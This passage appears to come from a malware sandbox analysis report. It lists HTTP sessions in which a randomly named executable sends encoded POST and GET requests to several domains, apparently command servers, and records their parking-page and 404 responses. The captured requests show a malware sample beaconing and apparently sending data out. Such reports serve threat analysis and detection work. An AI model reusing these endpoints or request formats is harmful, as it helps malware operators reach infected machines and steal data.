                                                                                                                                Oct 29, 2024 16:54:29.775329113 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNjOTY2MmYtMDJmOC00ZWY2LWFjZjgtYmQxMzdjMTcwNjYyIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.849712199.59.243.227805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:31.684633017 CET432OUTGET /026w/?edD=lYgGcuisybLP7Ls1fGp6HIm4b0bJG5Li1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRc66KMIi0XTCODv4m7XI1igXQNISi3YQnFgtoSZ+M/H7bQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.gold-rates.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:54:32.301740885 CET1236INHTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:54:32 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1518
                                                                                                                                x-request-id: f3f876fe-0043-4ce5-bcfc-28b4e04dd891
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XJQvAijUTrGtEbmNM2WTsLIDFSMgXD6Zg3wwukdEa+jCT9n3F/GXjYoF9DU8j0VaKGxm+P77pKM3kjS+diTSLQ==
                                                                                                                                set-cookie: parking_session=f3f876fe-0043-4ce5-bcfc-28b4e04dd891; expires=Tue, 29 Oct 2024 16:09:32 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 4a 51 76 41 69 6a 55 54 72 47 74 45 62 6d 4e 4d 32 57 54 73 4c 49 44 46 53 4d 67 58 44 36 5a 67 33 77 77 75 6b 64 45 61 2b 6a 43 54 39 6e 33 46 2f 47 58 6a 59 6f 46 39 44 55 38 6a 30 56 61 4b 47 78 6d 2b 50 37 37 70 4b 4d 33 6b 6a 53 2b 64 69 54 53 4c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XJQvAijUTrGtEbmNM2WTsLIDFSMgXD6Zg3wwukdEa+jCT9n3F/GXjYoF9DU8j0VaKGxm+P77pKM3kjS+diTSLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                Oct 29, 2024 16:54:32.302568913 CET971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjNmODc2ZmUtMDA0My00Y2U1LWJjZmMtMjhiNGUwNGRkODkxIiwicGFnZV90aW1lIjoxNzMwMjE3Mj


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.8497133.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:37.888039112 CET699OUTPOST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 6a 57 55 34 66 42 2b 4c 50 70 76 58 39 63 75 4f 4b 67 53 2f 6f 38 75 51 6d 4f 54 77 57 71 6d 59 35 71 4f 54 6b 41 61 35 67 77 46 6a 41 63 4f 49 35 56 72 42 63 35 6c 75 4b 34 72 7a 74 63 75 7a 6d 76 78 6d 6e 50 47 4c 36 70 45 62 43 67 36 7a 74 79 56 6e 4a 5a 42 32 72 64 2b 67 36 5a 61 4b 4b 2f 71 46 6c 37 79 57 6b 65 74 63 33 76 64 6e 30 74 75 65 74 36 67 47 4d 71 34 4e 46 66 4c 63 71 65 6e 37 76 4c 34 38 56 78 49 36 63 71 70 77 74 35 51 76 33 49 50 34 46 51 36 72 49 34 58 44 70 54 56 54 66 79 30 56 79 35 4e 2b 36 54 63 58 38 68 64 63 57 51 4a 35 79 6e 4d 3d
                                                                                                                                Data Ascii: edD=NFEz1TYM196VjWU4fB+LPpvX9cuOKgS/o8uQmOTwWqmY5qOTkAa5gwFjAcOI5VrBc5luK4rztcuzmvxmnPGL6pEbCg6ztyVnJZB2rd+g6ZaKK/qFl7yWketc3vdn0tuet6gGMq4NFfLcqen7vL48VxI6cqpwt5Qv3IP4FQ6rI4XDpTVTfy0Vy5N+6TcX8hdcWQJ5ynM=


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.8497143.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:40.472532988 CET719OUTPOST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 66 32 59 35 49 6d 54 6c 42 61 35 6c 77 46 6a 4c 38 4f 33 6d 6c 72 65 63 35 68 6d 4b 39 44 7a 74 59 47 7a 6d 75 42 6d 6d 2b 47 4d 36 35 45 5a 62 77 36 4c 79 69 56 6e 4a 5a 42 32 72 64 72 31 36 5a 43 4b 4c 4f 36 46 6b 61 79 56 69 75 74 66 77 76 64 6e 77 74 76 56 74 36 67 6f 4d 72 6b 72 46 61 48 63 71 66 58 37 76 35 51 37 4d 42 4a 51 59 71 6f 39 74 35 74 78 39 62 44 76 65 7a 43 6e 55 65 6e 69 6c 46 6b 35 46 51 38 54 78 35 6c 56 36 51 30 68 35 57 41 30 4d 7a 5a 4a 73 77 59 58 47 5a 33 48 64 79 70 6d 4e 61 4c 6a 75 42 31 69 50 71 45 79
                                                                                                                                Data Ascii: edD=NFEz1TYM196Vi2E4EjWLIJvU28uOBAS7o8iQmLzaRf2Y5ImTlBa5lwFjL8O3mlrec5hmK9DztYGzmuBmm+GM65EZbw6LyiVnJZB2rdr16ZCKLO6FkayViutfwvdnwtvVt6goMrkrFaHcqfX7v5Q7MBJQYqo9t5tx9bDvezCnUenilFk5FQ8Tx5lV6Q0h5WA0MzZJswYXGZ3HdypmNaLjuB1iPqEy


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.8497153.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:43.068149090 CET1736OUTPOST /b8ns/ HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.loginov.enterprises
                                                                                                                                Referer: http://www.loginov.enterprises/b8ns/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 4e 46 45 7a 31 54 59 4d 31 39 36 56 69 32 45 34 45 6a 57 4c 49 4a 76 55 32 38 75 4f 42 41 53 37 6f 38 69 51 6d 4c 7a 61 52 63 57 59 34 35 47 54 6b 69 43 35 69 77 46 6a 43 63 4f 4d 6d 6c 71 45 63 34 46 69 4b 39 48 4e 74 65 43 7a 6e 4d 5a 6d 76 73 69 4d 77 35 45 5a 47 67 36 77 74 79 56 79 4a 59 78 79 72 64 37 31 36 5a 43 4b 4c 4e 79 46 77 37 79 56 67 75 74 63 33 76 64 7a 30 74 75 79 74 36 6f 65 4d 6f 49 6b 46 4a 50 63 71 2f 48 37 74 74 77 37 46 42 49 32 66 71 70 75 74 35 68 51 39 62 65 57 65 79 33 49 55 5a 54 69 6e 45 52 35 42 68 77 46 7a 4a 77 71 7a 33 6b 30 30 48 6b 34 53 69 6c 71 6e 54 77 66 4e 2b 48 45 4b 52 39 50 48 61 33 6e 37 55 78 7a 49 38 39 6a 63 46 50 56 53 70 49 65 6c 59 57 62 78 2f 39 53 73 48 4d 46 36 6f 7a 33 2b 68 67 71 48 71 62 76 4f 52 69 44 2b 47 71 50 46 4f 61 78 4c 4b 56 37 57 6d 57 4a 2b 61 6a 6a 47 2f 6c 74 37 57 52 6c 34 36 4d 72 6e 48 37 6e 55 68 59 47 76 4c 39 59 4c 31 39 42 4a 68 48 4b 49 71 64 78 57 43 2f 31 6c 2f 74 68 72 79 75 35 45 72 2f 31 78 2b 35 63 4d 7a [TRUNCATED]
                                                                                                                                Data Ascii: edD=NFEz1TYM196Vi2E4EjWLIJvU28uOBAS7o8iQmLzaRcWY45GTkiC5iwFjCcOMmlqEc4FiK9HNteCznMZmvsiMw5EZGg6wtyVyJYxyrd716ZCKLNyFw7yVgutc3vdz0tuyt6oeMoIkFJPcq/H7ttw7FBI2fqput5hQ9beWey3IUZTinER5BhwFzJwqz3k00Hk4SilqnTwfN+HEKR9PHa3n7UxzI89jcFPVSpIelYWbx/9SsHMF6oz3+hgqHqbvORiD+GqPFOaxLKV7WmWJ+ajjG/lt7WRl46MrnH7nUhYGvL9YL19BJhHKIqdxWC/1l/thryu5Er/1x+5cMzmIcAPPw19UAMkRvnHiCuak1TgoLmY7Y4HMdDD6N/PctM2sCgs67chXPbrwbYs9CUuJlJMzWIA+ZzJ6gQ/0qx/nbvqCrwHHqM6ApiZ1Lcmd6wpq+kcIfbFSJyEQIt2kbHvxmF9Dv9Um4xLT/hQS2EC1jXOI9JDYOVzvjkKGoAfmgV10ZyhF6JjVjUEs7Y8pf6rNVGu+E8wetkL59T83lxgujnyeIHPBpMe5BLA0+rliHICW96U8WbdVUuA1MuFBAQdH7B3zpQNRwHylIvLC0CVbs8uQiU5Lyv1jAln38PPlFAGDGkgx31HGiu0PriIHpVGa2KWtpM5IQqH9LKHEcoh0pfyUhMg43KsiT/tBFPBx+i4QjSkMWnIQr1912mq8ODT6cfUCPRGIA8uPzTnk1rFSh5Z3hAYN0bam/s3T58w4RRGmOz5sWXKUWFyomh3MuwNwCFNl+mkcAcUBtryXKlh54O/Cp0UYst7/kP49CTazjrQOkcFkolrHSc1uMY/iIK28L4WYJ1E8OvP7G8uvGMburFUiyY9J0KIhKwYbDOnwFkRefFcplu+E3Xr8hSt2BvfIwSZeCFvsswFvHw9iCWmMq1Nt3Kv8Wk/Af/Ou+QlLghHKhSgpfJHpR8rP/gW/Sb9i1YuKGBGNdYrJKg9wmi7hy6njPNWhVmf9 [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.8497163.33.130.190805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:45.692089081 CET434OUTGET /b8ns/?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.loginov.enterprises
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:54:46.330796957 CET412INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:46 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 272
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 64 44 3d 41 48 73 54 32 6c 51 4d 37 61 66 6b 76 68 67 72 64 33 61 2b 4f 62 62 4a 31 4f 61 56 46 78 57 36 71 50 43 35 36 76 79 4c 59 2b 72 2f 68 62 71 4f 67 7a 61 6e 30 78 74 43 4e 38 4f 4c 34 42 6a 2f 50 75 73 7a 58 4a 48 76 6a 76 71 78 69 75 49 50 74 73 57 76 30 74 41 55 46 42 75 62 79 78 63 71 64 61 68 71 6c 4d 33 44 37 70 58 4c 49 4f 71 47 6c 72 57 4a 75 4c 70 7a 6f 4e 42 64 34 4f 2f 61 37 51 3d 3d 26 6d 52 52 3d 56 78 75 64 66 30 66 48 7a 4c 77 38 34 6e 33 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.849717103.71.154.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:51.717940092 CET675OUTPOST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 71 59 61 65 44 4e 44 6b 47 34 34 51 65 6f 42 38 62 57 50 30 7a 47 55 75 6f 33 6c 67 4e 39 4f 57 41 41 48 79 78 70 35 36 53 32 4f 43 65 63 6d 36 41 78 4e 4b 51 55 72 62 65 7a 43 6f 6f 6c 44 4d 44 33 61 43 6d 47 56 6a 35 73 39 68 53 77 4a 32 32 2f 2b 31 78 36 33 4d 5a 41 57 5a 64 4e 52 43 5a 70 31 42 35 6d 6c 42 56 56 33 46 79 30 34 73 54 69 6c 6b 38 35 7a 36 37 50 71 6d 49 66 38 70 4b 47 65 41 75 48 6f 75 4c 49 31 63 34 52 6d 59 35 6c 53 53 6c 4c 6f 45 68 34 30 6c 56 6c 41 51 42 52 38 42 65 4c 6e 72 55 77 47 6b 71 31 75 45 51 5a 36 75 47 6f 30 7a 43 37 55 3d
                                                                                                                                Data Ascii: edD=thkoKA3lS59VqYaeDNDkG44QeoB8bWP0zGUuo3lgN9OWAAHyxp56S2OCecm6AxNKQUrbezCoolDMD3aCmGVj5s9hSwJ22/+1x63MZAWZdNRCZp1B5mlBVV3Fy04sTilk85z67PqmIf8pKGeAuHouLI1c4RmY5lSSlLoEh40lVlAQBR8BeLnrUwGkq1uEQZ6uGo0zC7U=
                                                                                                                                Oct 29, 2024 16:54:52.674695015 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:52 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.849718103.71.154.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:54.660399914 CET695OUTPOST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 61 57 44 67 33 79 6a 63 4e 36 58 32 4f 43 57 38 6d 37 4e 52 4e 44 51 55 58 54 65 7a 75 6f 6f 6c 6e 4d 44 32 71 43 6d 78 68 69 36 63 39 6e 48 67 4a 77 34 66 2b 31 78 36 33 4d 5a 41 43 7a 64 4e 4a 43 5a 59 46 42 34 48 6c 43 62 31 33 47 6c 45 34 73 58 69 6b 6a 38 35 7a 45 37 4c 4b 41 49 64 30 70 4b 46 4b 41 67 7a 38 68 46 49 30 32 6c 68 6d 54 36 67 50 64 6a 70 73 5a 76 6f 41 61 54 6a 51 57 45 6e 4e 72 45 70 76 74 58 77 75 50 71 32 47 79 56 75 6e 47 63 4c 6b 44 63 73 44 42 6c 4e 6f 2b 31 31 6c 69 4b 58 79 76 4f 43 42 30 53 6f 5a 30
                                                                                                                                Data Ascii: edD=thkoKA3lS59Vo4KeBqXkRI4XboB8V2PwzGQuo2hOKPaWDg3yjcN6X2OCW8m7NRNDQUXTezuoolnMD2qCmxhi6c9nHgJw4f+1x63MZACzdNJCZYFB4HlCb13GlE4sXikj85zE7LKAId0pKFKAgz8hFI02lhmT6gPdjpsZvoAaTjQWEnNrEpvtXwuPq2GyVunGcLkDcsDBlNo+11liKXyvOCB0SoZ0
                                                                                                                                Oct 29, 2024 16:54:55.661431074 CET691INHTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:54:55 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.849719103.71.154.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:54:57.199455023 CET1712OUTPOST /1t94/ HTTP/1.1
                                                                                                                                Host: www.2925588.com
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.2925588.com
                                                                                                                                Referer: http://www.2925588.com/1t94/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
